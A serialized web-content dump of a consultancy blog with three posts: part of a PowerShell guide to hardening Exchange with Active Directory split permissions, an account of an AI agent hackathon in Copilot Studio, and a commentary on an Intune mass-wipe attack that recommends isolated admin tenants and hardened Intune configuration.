",[251,23763,23764],{},"\"Switch to Active Directory split permissions\""," in\n",[2672,23767,23581],{"href":23768,"rel":23769},"https://learn.microsoft.com/en-us/exchange/configure-exchange-server-for-split-permissions",[2676],[3456,23771,23772],{},"(NOT RBAC split permissions)",[12,23774,23775,23776,23779],{},"In essence, it will remove the dangerous permissions of the ",[251,23777,23778],{},"\"Exchange Windows Permissions\""," group and also remove Exchange as a group member.",[524,23781,23782],{},[102,23783,23784,540,23787,540,23790,540,23793],{},[102,23785,23786],{"style":23658},"Setup.exe",[102,23788,23789],{"style":23678},"/IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF",[102,23791,23792],{"style":23678},"/PrepareAD",[102,23794,23795],{"style":23678},"/ActiveDirectorySplitPermissions:true",[52,23797,420,23799,23801,23802],{"style":23798},"background:#f4f4f4; border-left:4px solid var(--color-green-blue); border-radius:0 6px 6px 0; padding:0.75rem 1rem; margin:1rem 0; font-size:0.88rem; color:#000520;",[251,23800,23610],{}," To revert back, simply use ",[63,23803,23804],{},"/ActiveDirectorySplitPermissions:false",[186,23806,23808],{"id":23807},"grant-ad-permissions","Grant AD Permissions",[12,23810,23811],{},"Create a custom AD group and make Exchange servers members.",[524,23813,23814,23820,23822,540,23825,23828,23829,23832,23833,23836,23837,540,23839,540,23842,23845,23846,23848,23828,23851,23854,23855],{},[102,23815,23816],{},[102,23817,23819],{"style":23818},"color:var(--color-black-40)","# adjust OU Path first!",[531,23821],{},[102,23823,23824],{"style":23658},"New-ADGroup",[102,23826,23827],{"style":23678},"-Name"," \"AD_Custom Exchange Split permissions replacement\" ",[102,23830,23831],{"style":23678},"-GroupCategory"," Security ",[102,23834,23835],{"style":23678},"-GroupScope"," DomainLocal ",[102,23838,23696],{"style":23678},[251,23840,23841],{},"\"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\"",[102,23843,23844],{"style":23678},"-Description"," \"replaces the permissions lost by split permissions on relevant OUs\"",[531,23847],{},[102,23849,23850],{"style":23658},"Add-ADGroupMember",[102,23852,23853],{"style":23678},"-Members"," \"Exchange Trusted Subsystem\"\n",[102,23856,23857],{"style":23818},"# reboot Exchange servers for permissions via group to work",[12,23859,23860],{},"I’ve created a script to make delegating the AD permissions easy per use case.",[2110,23862,23863],{},[12,23864,23865,23866,23869],{},"Without these permissions the Exchange server would receive the error ",[63,23867,23868],{},"“INSUFF_ACCESS_RIGHTS”"," from AD.",[12,23871,23872,23873,23878],{},"Download ",[2672,23874,23877],{"href":23875,"rel":23876},"https://github.com/glueckkanja/code-snippets/blob/main/ExchangeADSplitPermission/Add-ExchangeADSplitPermissionOnOU.ps1",[2676],"Add-ExchangeADSplitPermissionOnOU.ps1"," from glueckkanja GitHub",[12,23880,23881],{},"It can grant the following PermissionTypes:",[12,23883,23885,23888,23890,23891,23893],{"style":23884},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8;",[251,23886,23887],{},"CreateUserAndContact",[531,23889],{},"Create/delete, ResetPassword and WriteAllProperties for Users and Contacts",[531,23892],{},[6638,23894,23895],{},"Exchange cmdlets: `New-Mailbox`, `New-RemoteMailbox`, `New-MailUser`, `New-MailContact` and matching `Remove-*`",[12,23897,23899,23902,23904,23905,23907],{"style":23898},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8",[251,23900,23901],{},"GroupManage",[531,23903],{},"Create/Delete Groups, Modify Member",[531,23906],{},[6638,23908,23909,23910,23912],{},"Exchange cmdlets: `New-DistributionGroup`, `Remove-DistributionGroup`, `Add-DistributionGroupMember`, `Update-DistributionGroupMember`, `Remove-DistributionGroupMember`",[531,23911],{},"Also: user managing DistributionGroups they own via EAC",[12,23914,23915,23918,23920,23921,23923],{"style":23898},[251,23916,23917],{},"UserSendAs",[531,23919],{},"Modify AD Permissions on Users",[531,23922],{},[6638,23924,23925],{},"Exchange cmdlet: `Add-ADPermission`",[12,23927,23928,23931,23933,23934,23936],{"style":23898},[251,23929,23930],{},"GroupSendAs",[531,23932],{},"Modify AD Permissions on Groups",[531,23935],{},[6638,23937,23925],{},[12,23939,23940],{},[251,23941,23942],{},"How to use the script:",[524,23944,23945,540,23947,23950,23951,23954,23955,23958,23959,23962,23964,540,23966,23968,23969,23971,23972,23958,23974,540,23976,23968,23978,23980,23981,23958,23983,540,23985,23987,23988,23990,23991,23958,23993,540,23995,23987,23997,23999,24000,23958],{},[102,23946,23877],{"style":23658},[102,23948,23949],{"style":23678},"-TargetOU"," \u003COU> ",[102,23952,23953],{"style":23678},"-PermissionType"," \u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact> ",[102,23956,23957],{"style":23678},"-Trustee"," \"AD_Custom Exchange Split permissions replacement\"\n",[102,23960,23961],{"style":23818},"# For example",[531,23963],{},[102,23965,23877],{"style":23658},[102,23967,23949],{"style":23678}," \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[102,23970,23953],{"style":23678}," GroupManage ",[102,23973,23957],{"style":23678},[102,23975,23877],{"style":23658},[102,23977,23949],{"style":23678},[102,23979,23953],{"style":23678}," GroupSendAs ",[102,23982,23957],{"style":23678},[102,23984,23877],{"style":23658},[102,23986,23949],{"style":23678}," \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[102,23989,23953],{"style":23678}," UserSendAs ",[102,23992,23957],{"style":23678},[102,23994,23877],{"style":23658},[102,23996,23949],{"style":23678},[102,23998,23953],{"style":23678}," CreateUserAndContact ",[102,24001,23957],{"style":23678},[186,24003,24005],{"id":24004},"grant-exchange-rbac","Grant Exchange RBAC",[12,24007,24008],{},[251,24009,24010],{},"Re-enable -BypassSecurityGroupManagerCheck parameter for Add-DistributionGroupMember and Remove-DistributionGroupMember cmdlets:",[524,24012,24013],{},[102,24014,24015,540,24018,24020,24021,24024,24025,24027,24028,24030],{},[102,24016,24017],{"style":23658},"New-RoleGroup",[102,24019,23827],{"style":23678}," \"SplitPermission Security Group Creation and Membership\" ",[102,24022,24023],{"style":23678},"-Roles"," \"Security Group Creation and Membership\" ",[102,24026,23853],{"style":23678}," \"Organization Management\",\"Recipient Management\" ",[102,24029,23844],{"style":23678}," \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\"",[2110,24032,24033],{},[12,24034,24035,24037],{},[251,24036,23610],{}," Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[12,24039,24040,24042,24045,24047],{},[531,24041],{},[251,24043,24044],{},"Re-enable New-Mailbox, New-RemoteMailbox, New-MailContact, Remove-... cmdlets with needed parameters:",[531,24046],{},[524,24048,24049,540,24051,24053,24054,24056,24057,24027,24059,24061],{},[102,24050,24017],{"style":23658},[102,24052,23827],{"style":23678}," \"SplitPermission Mail Recipient Creation\" ",[102,24055,24023],{"style":23678}," \"Mail Recipient Creation\" ",[102,24058,23853],{"style":23678},[102,24060,23844],{"style":23678}," \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[41,24063,24065],{"id":24064},"conclusions","Conclusions",[12,24067,24068],{},"I hope this guide helps more organizations take the important step of securing their Active Directory against compromise via Exchange. In my experience implementing the Exchange AD Split Permissions model across multiple customers, I have not encountered any issues and the adoption has been smooth.",[12,24070,24071],{},"I also hope Microsoft will introduce a native, OU-based approach to achieve this level of granularity, rather than the current all-or-nothing model, which would make widespread adoption significantly easier.",[12,24073,24074,24075,1884,24080,24085],{},"A note on AD Tiering: Please do not log on to Exchange servers with Domain Admin or any other Tier 0 accounts. Treat Exchange servers as Tier 1 and implement AD Tiering as soon as possible. As a first step, I recommend using ",[2672,24076,24079],{"href":24077,"rel":24078},"https://www.pingcastle.com/",[2676],"PingCastle",[2672,24081,24084],{"href":24082,"rel":24083},"https://www.semperis.com/purple-knight/",[2676],"Purple Knight"," to assess your AD security posture and identify control path exposures.",[2127,24087,24088],{},"\ncode {\n  font-size: inherit\n}\n",{"title":65,"searchDepth":111,"depth":111,"links":24090},[24091,24092,24093,24094,24097,24101],{"id":23448,"depth":111,"text":23449},{"id":23495,"depth":111,"text":23496},{"id":23594,"depth":111,"text":23595},{"id":23635,"depth":111,"text":23636,"children":24095},[24096],{"id":23645,"depth":329,"text":23646},{"id":23757,"depth":111,"text":23758,"children":24098},[24099,24100],{"id":23807,"depth":329,"text":23808},{"id":24004,"depth":329,"text":24005},{"id":24064,"depth":111,"text":24065},{"lang":2171,"seoTitle":24103,"titleClass":2173,"date":24104,"blogtitlepic":24105,"socialimg":24106,"customExcerpt":24107,"keywords":24108,"hreflang":24109,"scripts":24116,"asideNav":24117,"maxContent":2181,"published":2181},"Exchange AD Split Permissions: Secure Active Directory with Least Privilege","2026-03-01","head-exchange-ad-split-permissions","/blog/heads/head-exchange-ad-split-permissions.jpg","Even organizations that have fully migrated their mailboxes to the cloud often still run on-premises Exchange servers and with them, an underestimated security risk for Active Directory. The \"AD Split Permissions\" model strips Exchange of the broad AD privileges attackers could exploit for a full domain compromise. Until now, adoption has largely failed due to the process changes it imposes on administrators. This article shows how to elegantly overcome exactly that hurdle: a script that selectively re-grants the lost AD permissions on the relevant OUs only, preserving the familiar admin workflow while still achieving the full security benefit.","Exchange Server, Active Directory, AD split permissions, RBAC, Exchange permissions, AdminSDHolder, least privilege, AD ACL, PowerShell",[24110,24112,24114],{"lang":2260,"href":24111},"/de/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2263,"href":24113},"/es/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2171,"href":24115},"/en/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"slick":2181,"form":2181},{"menuItems":24118},[24119,24121,24123,24125,24127],{"href":24120,"text":23449},"#tldr-what-if-we-remove-the-downsides",{"href":24122,"text":23496},"#why-do-we-care-now",{"href":24124,"text":23595},"#but-why-is-no-one-doing-it",{"href":24126,"text":23636},"#show-me-this-no-regrets-option",{"href":24128,"text":24065},"#conclusions","/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"title":23442,"description":65},"posts/2026-03-01-exchange-ad-split-permissions-hardening","hbPQT2iCiaFmQVLIJ_ceL8Krt8RrsgYm5rLL3T9NCBU",{"id":24134,"title":24135,"author":24136,"body":24137,"cta":2166,"description":24141,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":24173,"moment":24175,"navigation":2181,"path":24188,"seo":24189,"stem":24190,"tags":24191,"webcast":2168,"__hash__":24195},"content_en/posts/2026-03-16-ai-agent-hackathon.md","Six Agents. Four Weeks. Real Production.",[2461],{"type":9,"value":24138,"toc":24171},[24139,24142,24145,24148,24151,24154,24159,24162,24165,24168],[12,24140,24141],{},"How many hours does your IT department spend each week on tasks an agent could handle in minutes?",[12,24143,24144],{},"There is a type of process that almost every IT department in German companies knows: someone reads contracts. Someone else sorts requirements into categories. Yet another person answers the same questions about deliveries that someone already answered yesterday. These are not glamorous problems. But they are the ones that collectively cost tens of thousands of hours per year — and they are surprisingly well-suited for AI agents, if you know where to apply the lever.",[12,24146,24147],{},"Six companies did exactly that in February at our office in Offenbach. Kiekert now categorizes R&D requirements using rule-based logic, with a confidence score and a feedback loop. The agent is already running in production. Dr. Oetker built a Contract Review Assistant that checks IT contracts for critical clauses and generates a structured review report for procurement and legal. Eckes-Granini entered with two agents: an onboarding agent that guides new employees through MFA, Office setup, and security policies from their first login, and a logistics agent that answers dispatchers' questions about shipments, rates, and carriers. igefa developed a voice-based hotline agent for internal IT support, connected to JIRA and Confluence. And lila logistik brought perhaps the most unusual project: a use case generator that monitors SharePoint and Exchange to identify automation potential — because the real problem is often not the technology, but that no one in the organization recognizes the right places to automate.",[12,24149,24150],{},"All of this was built in Copilot Studio, with Agent Flows, Dataverse connections and MCP connectors, supported by four of our MVPs. Four weeks of building, alongside regular day-to-day business. Participants had to carve out every hour for it, between tickets, quarterly closes, and operational demands. That six working agents stood at the end says less about the technology than about the teams who built them.",[12,24152,24153],{},"On March 10th at the Microsoft Office Frankfurt came the final test: six presentations, 20 minutes each, judged on business impact, technical depth, and audience applause (yes, that is also on the scoring sheet). Kiekert won because their agent is running in production, built by someone from the business unit — no IT background, no prior experience with Copilot Studio. Dr. Oetker won because contract review is so universal that the jury started thinking about their own IT contracts afterwards. That all six teams built a working agent in four weeks alongside their regular workload — that was ultimately the real news of the day.",[23484,24155],{"thumb":24156,"alt":24157,"id":24158,":full-width":3821},"/thumbs/thumb-ai-agent-hackathon.jpg","Presentation of the glueckkanja AI Agent Hackathon at Microsoft Office Frankfurt: six teams presenting their Copilot Studio agents to an audience.","GjumQAnKj8k",[52,24160,24161],{"style":23491},"glueckkanja AI Agent Hackathon – Six companies, six agents, four weeks",[12,24163,24164],{},"The format is called the glueckkanja AI Agent Hackathon. It grew out of a Microsoft Hackathon in Munich where we participated with Knorr-Bremse. Microsoft then asked us to continue the format with our customers. The idea is simple: companies apply with a concrete process that is currently manual. We sharpen the use case, define the architecture, and build together. For those not ready to jump straight into the hackathon: we also offer workshops to identify use cases and prepare the agent architecture — either as an entry point or as a standalone format.",[12,24166,24167],{},"The next glueckkanja AI Agent Hackathon starts in fall 2026. Registration is open. If you want to identify use cases and prepare your environment beforehand: we are happy to help. Reach out to us.",[12,24169,24170],{},"Thank you to Sylvia and Miriam from Microsoft for their trust in the format. To Kiekert, Dr. Oetker, Eckes-Granini, igefa and lila logistik for their courage and commitment. And to our glueckkanja team for making it happen.",{"title":65,"searchDepth":111,"depth":111,"links":24172},[],{"lang":2171,"seoTitle":24174,"titleClass":2173,"date":24175,"categories":24176,"blogtitlepic":24177,"socialimg":24178,"customExcerpt":24179,"keywords":24180,"hreflang":24181,"published":2181},"glueckkanja AI Agent Hackathon: Six Companies Build AI Agents with Copilot Studio","2026-03-16",[2962],"head-ai-agent-hackathon.jpg","/blog/heads/head-ai-agent-hackathon.jpg","Six companies, four weeks of building, six working AI agents — that was the first glueckkanja AI Agent Hackathon. Kiekert, Dr. Oetker, Eckes-Granini, igefa and lila logistik built agents in Copilot Studio that are running in production today. Here is what was built and how the format works.","AI Agent Hackathon, Copilot Studio, glueckkanja, AI Agents, Microsoft Copilot, Agent Flows, Dataverse, MCP Connector, Kiekert, Dr. Oetker, Eckes-Granini, igefa, lila logistik, AI automation, enterprise AI, process automation",[24182,24184,24186],{"lang":2260,"href":24183},"/de/posts/2026-03-16-ai-agent-hackathon",{"lang":2171,"href":24185},"/en/posts/2026-03-16-ai-agent-hackathon",{"lang":2263,"href":24187},"/es/posts/2026-03-16-ai-agent-hackathon","/posts/2026-03-16-ai-agent-hackathon",{"title":24135,"description":24141},"posts/2026-03-16-ai-agent-hackathon",[24192,24193,24194,22194],"AI","Copilot Studio","Hackathon","_mIXHNCs5jKlIww9Bh4E4kHE1qECSwksCqRuS7m98X0",{"id":24197,"title":24198,"author":24199,"body":24200,"cta":2166,"description":24204,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":24449,"moment":24451,"navigation":2181,"path":24499,"seo":24500,"stem":24501,"tags":24502,"webcast":2168,"__hash__":24504},"content_en/posts/2026-03-20-stryker-attack-intune-privilege.md","No Malware Needed. Just One Admin Account.",[2209],{"type":9,"value":24201,"toc":24437},[24202,24205,24208,24212,24214,24217,24220,24223,24227,24229,24232,24235,24238,24241,24245,24247,24250,24253,24257,24259,24262,24265,24268,24272,24274,24277,24283,24287,24289,24297,24300,24303,24306,24312,24315,24320,24329,24333,24335,24343,24346,24355,24358,24361,24364,24367,24370,24373,24377,24379,24382,24385,24388,24396,24399,24402,24406,24408],[12,24203,24204],{},"Wednesday, March 11, 2026. Employees at Stryker offices across 79 countries switched on their computers and found them blank. Login screens replaced by a logo. Corporate laptops, company phones, personal devices enrolled in the company's BYOD program. All wiped simultaneously, overnight. No ransomware. No malware signatures. Nothing for an endpoint detection tool to catch.",[12,24206,24207],{},"The attacker, a pro-Iranian hacktivist group named Handala, had turned Stryker's own IT management infrastructure into the weapon.",[41,24209,24211],{"id":24210},"what-actually-happened","What actually happened",[12,24213,31],{},[12,24215,24216],{},"The core of the attack was not a sophisticated exploit or a zero-day vulnerability. It was something far simpler and, frankly, far more common: an administrator account was compromised, and that account had access to Microsoft Intune.",[12,24218,24219],{},"According to reporting by BleepingComputer, roughly 80,000 devices were wiped between 5:00 and 8:00 a.m. UTC. Handala claimed the number exceeded 200,000, including servers and mobile devices across the company's global operations in 79 countries.",[12,24221,24222],{},"No custom malware. No malicious binary to detect. A living-off-the-land attack, executed entirely through a legitimate management console.",[41,24224,24226],{"id":24225},"why-this-attack-succeeded","Why this attack succeeded",[12,24228,31],{},[12,24230,24231],{},"There is a structural issue at the root of this, and it is not unique to Stryker. It is endemic across enterprises.",[12,24233,24234],{},"Most organizations treat administrative tasks and day-to-day work as activities that can comfortably coexist on the same device, under the same user identity. An IT administrator answers emails, browses the web, clicks the occasional link, and — from that same session, on that same machine — manages cloud infrastructure, approves access changes, or in this case, touches a device management console with the power to wipe the entire fleet.",[12,24236,24237],{},"This is the attack surface. When the everyday work context and the privileged administration context share a common endpoint and identity, any compromise of that endpoint is automatically a compromise of everything that identity can reach. Phishing, credential theft via infostealer malware, adversary-in-the-middle (AiTM) session token theft — all of them become a direct path to the most powerful controls in your environment. No privilege escalation needed. The attacker simply uses what's already there.",[12,24239,24240],{},"In Stryker's case, that access happened to include an Intune tenant managing devices across six continents.",[41,24242,24244],{"id":24243},"cisa-has-seen-enough","CISA has seen enough",[12,24246,31],{},[12,24248,24249],{},"The scale and brazenness of the attack prompted an unusual response: CISA, the U.S. Cybersecurity and Infrastructure Security Agency, issued guidance directly addressing the risk of compromised device management platforms. The agency confirmed it was aware of the attack vector and urged organizations to take concrete action, ensuring that high-impact Intune functions like device wipes require a second administrator's approval before executing.",[12,24251,24252],{},"This is a rare and significant signal. When a federal security agency issues targeted guidance in the immediate aftermath of a specific incident, the message is clear: this is not an edge case. This is a pattern, and other organizations are likely running the same exposure.",[41,24254,24256],{"id":24255},"separation-is-not-a-luxury-it-is-the-control","Separation is not a luxury. It is the control.",[12,24258,31],{},[12,24260,24261],{},"The Stryker attack is a useful case study precisely because it illustrates the blast radius of a flat privilege model. The attacker did not need to escalate privileges through a chain of vulnerabilities. They gained access to credentials, or a session token, at one level and found that level was already sufficient to cause catastrophic, global, irreversible damage.",[12,24263,24264],{},"The architectural answer to this problem has a name: the Microsoft Enterprise Access Model (EAM). Its core principle is tiered administration: privileged operations are performed using dedicated accounts and dedicated devices, strictly separated from the everyday work context. This least-privilege approach means that a compromised productivity account cannot reach the management plane, and a compromised management account cannot reach control-plane operations. This applies equally to cloud-only environments and hybrid setups including on-premises reach-back to Active Directory via Entra ID, where a single over-privileged account can still bridge the cloud and the domain.",[12,24266,24267],{},"The idea is straightforward. Administrative work happens on administrative devices. The identity used to manage your Microsoft 365 tenant, your Intune environment, your Azure infrastructure, is never the same identity used to read email or attend Teams calls. The device used for those administrative sessions is hardened, restricted, and isolated from the regular internet browsing and productivity context that creates exposure. Lateral movement becomes structurally harder because there is no lateral path.",[41,24269,24271],{"id":24270},"two-layers-of-defense","Two layers of defense",[12,24273,31],{},[12,24275,24276],{},"Addressing this threat model properly requires working at two levels simultaneously: securing who can touch your management plane and its credentials, and hardening how that management plane itself is configured and operated. These are not the same problem, and both matter.",[12,24278,24279],{},[2642,24280],{"alt":24281,"src":24282},"Risk and product mapping for the Stryker attack scenario: Managed Red Tenant addresses identity and access risks, Managed Intune addresses endpoint management risks","https://res.cloudinary.com/c4a8/image/upload/v1774005366/blog/pics/stryker_risk_product_mapping.svg",[186,24284,24286],{"id":24285},"managed-red-tenant-protecting-the-administrative-context","Managed Red Tenant: protecting the administrative context",[12,24288,47],{},[12,24290,24291,24292,24296],{},"The first layer is isolating privileged access entirely. This is what our ",[2672,24293,24295],{"href":24294},"/en/security/managed-red-tenant","Managed Red Tenant"," is built for.",[12,24298,24299],{},"The Managed Red Tenant provides a fully isolated, cloud-based administrative environment, a dedicated Microsoft Entra tenant (\"the Red Tenant\") used exclusively for privileged operations. Administrative identities live here. Administrative devices are managed here. Nothing from the regular work environment bleeds across.",[12,24301,24302],{},"For the most critical roles, those with Control Plane access, like Global Administrators, we implement the \"Clean Keyboard\" approach: a physical Privileged Admin Workstation (PAW) with dedicated hardware, hardened policies, and no exposure to the everyday work context whatsoever. For broader administrative roles, we offer scalable Virtual Access Workstations (VAW) built on a hardened Azure Virtual Desktop infrastructure within the Red Tenant. The access path itself is protected through Microsoft Entra Private Access, applying Zero Trust Network Access and Conditional Access policies before any session can be established.",[12,24304,24305],{},"Microsoft Entra Internet Access blocks public internet access from administrative sessions and restricts connectivity strictly to privileged interfaces and authorized tenant environments. Near real-time session revocation is possible through Universal Conditional Access Evaluation, meaning a revoked credential doesn't linger as a valid session.",[12,24307,24308,24309,24311],{},"The Managed Red Tenant is monitored 24/7 by our ",[2672,24310,3696],{"href":4296},", with custom-developed detections built specifically around administrative permissions and access patterns. An attacker who somehow compromised a credential in this environment would not get three undetected hours to execute wipe commands across a global fleet.",[12,24313,24314],{},"This matters particularly for roles like Intune administrators. They know how to secure clients, but securing a privileged admin workstation requires a different set of skills — enterprise access architecture, identity hardening, Zero Trust controls — that typically sits with the security team. A Managed Red Tenant removes that burden entirely: Intune admins get a professionally managed, consistently hardened workstation without needing to become security workstation experts themselves. The same applies to any highly privileged role across the organization.",[23484,24316],{"thumb":24317,"alt":24318,"id":24319,":full-width":3821},"/thumbs/thumb-managed-red-tenant.jpg","Jan Geisbauer and Thomas Naunheim discussing Managed Red Tenant cybersecurity strategy","rOEIvItNkjE",[52,24321,24322,24323],{"style":23491},"More on our ",[2672,24324,24328],{"href":24325,"target":4914,"rel":24326},"https://www.youtube.com/playlist?list=PLPxBXiOFJRHelegu_B-uZAyz2UrOSxioL",[24327],"noopener","YouTube channel",[186,24330,24332],{"id":24331},"managed-intune-locking-down-the-management-plane-itself","Managed Intune: locking down the management plane itself",[12,24334,47],{},[12,24336,24337,24338,24342],{},"The second layer is ensuring that Intune, the very tool that was weaponized in the Stryker attack, is configured, operated, and continuously maintained to the highest security standard. This is where our ",[2672,24339,24341],{"href":24340},"/en/entra-intune/managed-intune","Managed Intune"," service comes in.",[12,24344,24345],{},"One of the core findings from incidents like Stryker is that organizations often inherit Intune environments that have grown organically over time: Policies stacked on top of policies, manual changes made through the portal that are difficult to audit, and security baselines that have not kept pace with Microsoft's own evolving recommendations. That kind of environment is exactly where configuration drift creates exploitable gaps.",[12,24347,24348,24349,24354],{},"Microsoft has recently published ",[2672,24350,24353],{"href":24351,"rel":24352},"https://techcommunity.microsoft.com/blog/intunecustomersuccess/best-practices-for-securing-microsoft-intune/4502117",[2676],"best practices for securing Microsoft Intune"," — a timely signal that even Microsoft considers Intune hardening a topic that needs explicit attention across the industry. Our Managed Intune service is built on exactly these principles, and we have implemented Microsoft's recommendations as part of our baseline.",[12,24356,24357],{},"Our Managed Intune service is built on the glueckkanja Intune Foundation: A set of proven, continuously maintained best practices for device management, delivered entirely as code using Terraform and our own TerraProvider. Every change is automated, version-controlled, and auditable. There are no undocumented click-through configurations that an attacker could exploit by understanding the gap between what was intended and what was set.",[12,24359,24360],{},"From a security perspective, this means Zero Trust, App Protection Policies, and Endpoint Security configurations are applied by design, consistently, across Windows, macOS, iOS, and Android, not as one-time deployments, but as continuously enforced, evergreen baselines that track Microsoft's own security guidance as it evolves.",[12,24362,24363],{},"Critically, Managed Intune reflects the operational maturity required to secure modern endpoint management: continuous compliance monitoring, structured change governance, and regular service reviews, not as optional extras, but as baseline operations. But securing the Intune configuration is only half the picture. If the administrator accessing the console does so from an unprotected device, the management plane remains exposed regardless which is exactly where the Managed Red Tenant completes the model.",[12,24365,24366],{},"Since all configurations are deployed as code based on the Intune Foundation, we enforce a strict four-eyes principle with peer review, additional automated validation, and controlled deployment pipelines. This eliminates unmanaged portal changes within the Intune Foundation and ensures a consistent, auditable, and secure baseline across all devices.",[12,24368,24369],{},"Administrative access is governed through a least-privilege model using GDAP and Azure Lighthouse, with clearly defined responsibilities and tightly scoped access to the customer tenant. This significantly reduces the attack surface associated with privileged operations.",[12,24371,24372],{},"Device-level actions, including destructive operations, remain under customer responsibility, as their execution is tightly coupled to organization-specific processes and internal governance frameworks. Microsoft and CISA recommend securing such actions through additional safeguards, such as multi-admin approval controls within Intune.",[41,24374,24376],{"id":24375},"the-uncomfortable-question","The uncomfortable question",[12,24378,31],{},[12,24380,24381],{},"The Stryker attack is not an indictment of Microsoft Intune. Intune behaved exactly as designed. It executed the commands it received from an authenticated administrator. The failure was not in the tool. It was in the absence of controls around who could reach that tool, from what context, and with what level of authorization.",[12,24383,24384],{},"That is a governance and architecture problem. And it is the same problem that exists in most organizations running Microsoft 365 today.",[12,24386,24387],{},"If your administrators access Intune, Entra ID, or Azure from the same devices and identities they use for everyday work and if your Intune environment has grown through years of manual portal changes rather than a structured, automated operating model, you are carrying the same structural risk that Stryker carried on March 10th. The question is whether an adversary will find that exposure before you address it.",[12,24389,24390,24392,24393,24395],{},[2672,24391,24295],{"href":24294}," addresses the privilege and identity layer. ",[2672,24394,24341],{"href":24340}," addresses the configuration and operational layer. Together, they close the two gaps that made the Stryker attack possible.",[12,24397,24398],{},"If you want to understand how either service maps to your current environment, or where your specific exposure points are, we are happy to talk through it.",[12,24400,24401],{},"We will also be publishing a deep-dive article shortly, examining how the Stryker incident was able to happen in the first place.",[41,24403,24405],{"id":24404},"further-information","Further information",[12,24407,31],{},[1254,24409,24410,24417,24423,24430],{},[1257,24411,24412],{},[2672,24413,24416],{"href":24414,"rel":24415},"https://www.cisa.gov/secure-cloud-business-applications",[2676],"CISA: Securing Cloud Business Applications",[1257,24418,24419],{},[2672,24420,24422],{"href":24351,"rel":24421},[2676],"Microsoft: Best practices for securing Microsoft Intune",[1257,24424,24425],{},[2672,24426,24429],{"href":24427,"rel":24428},"https://techcrunch.com/2026/03/19/cisa-urges-companies-to-secure-microsoft-intune-systems-after-hackers-mass-wipe-stryker-devices/?utm_campaign=social",[2676],"TechCrunch: CISA urges companies to secure Microsoft Intune systems after hackers mass-wipe Stryker devices",[1257,24431,24432],{},[2672,24433,24436],{"href":24434,"rel":24435},"https://marketplace.microsoft.com/de-de/product/saas/glueckkanja-gabag.redtenant?tab=overview",[2676],"Managed Red Tenant on Azure Marketplace",{"title":65,"searchDepth":111,"depth":111,"links":24438},[24439,24440,24441,24442,24443,24447,24448],{"id":24210,"depth":111,"text":24211},{"id":24225,"depth":111,"text":24226},{"id":24243,"depth":111,"text":24244},{"id":24255,"depth":111,"text":24256},{"id":24270,"depth":111,"text":24271,"children":24444},[24445,24446],{"id":24285,"depth":329,"text":24286},{"id":24331,"depth":329,"text":24332},{"id":24375,"depth":111,"text":24376},{"id":24404,"depth":111,"text":24405},{"lang":2171,"seoTitle":24450,"titleClass":2173,"date":24451,"categories":24452,"blogtitlepic":24453,"socialimg":24454,"customExcerpt":24455,"keywords":24456,"hreflang":24457,"asideNav":24464,"contactInContent":24479,"maxContent":2168,"published":2181},"The Stryker Attack: How a Compromised Admin Account Wiped 80,000 Devices via Intune","2026-03-20",[2176],"head-stryker.jpg","/blog/heads/head-stryker.jpg","On March 11, 2026, Handala wiped devices across 79 countries using nothing but a compromised Intune admin account. No malware, no exploit, just legitimate management tooling turned into a weapon. Here is what happened, why it worked, and how the two architectural gaps that made it possible can be closed.","Stryker attack, Handala, Microsoft Intune wipe, privileged access management, admin workstation, Managed Red Tenant, Managed Intune, Zero Trust, Privileged Admin Workstation, PAW, Enterprise Access Model, CISA, endpoint management security",[24458,24460,24462],{"lang":2260,"href":24459},"/de/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2263,"href":24461},"/es/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2171,"href":24463},"/en/posts/2026-03-20-stryker-attack-intune-privilege",{"menuItems":24465},[24466,24468,24470,24472,24475,24477],{"href":24467,"text":24211},"#what-actually-happened",{"href":24469,"text":24226},"#why-this-attack-succeeded",{"href":24471,"text":24244},"#cisa-has-seen-enough",{"href":24473,"text":24474},"#separation-is-not-a-luxury-it-is-the-control","Separation is not a luxury",{"href":24476,"text":24271},"#two-layers-of-defense",{"href":24478,"text":24376},"#the-uncomfortable-question",{"quote":2181,"infos":24480},{"bgColor":2201,"headline":2202,"subline":24481,"level":41,"textStyling":2204,"flush":2205,"person":24482,"form":24484},"Want to know how Managed Red Tenant and Managed Intune close the gaps the Stryker attack exploited? Fill out the form and we'll walk you through how it maps to your environment.",{"image":2207,"cloudinary":2181,"alt":2208,"name":2209,"quotee":2209,"quoteeTitle":2210,"quote":24483},"The Stryker attack is a wake-up call for every organization running Microsoft Intune. The tool did exactly what it was told. The problem was that no one should have been able to tell it that — not from a compromised everyday account, not without a second approval, not without an isolated administrative environment. That is the gap we help organizations close.",{"ctaText":2213,"cta":24485,"method":2169,"action":2216,"fields":24486},{"skin":2215},[24487,24488,24489,24490,24491,24492,24493,24494,24496,24497,24498],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2242,"value":2176},{"type":2241,"id":2244,"value":2245},{"type":2241,"id":2247,"value":24495},"Form: Blog Stryker 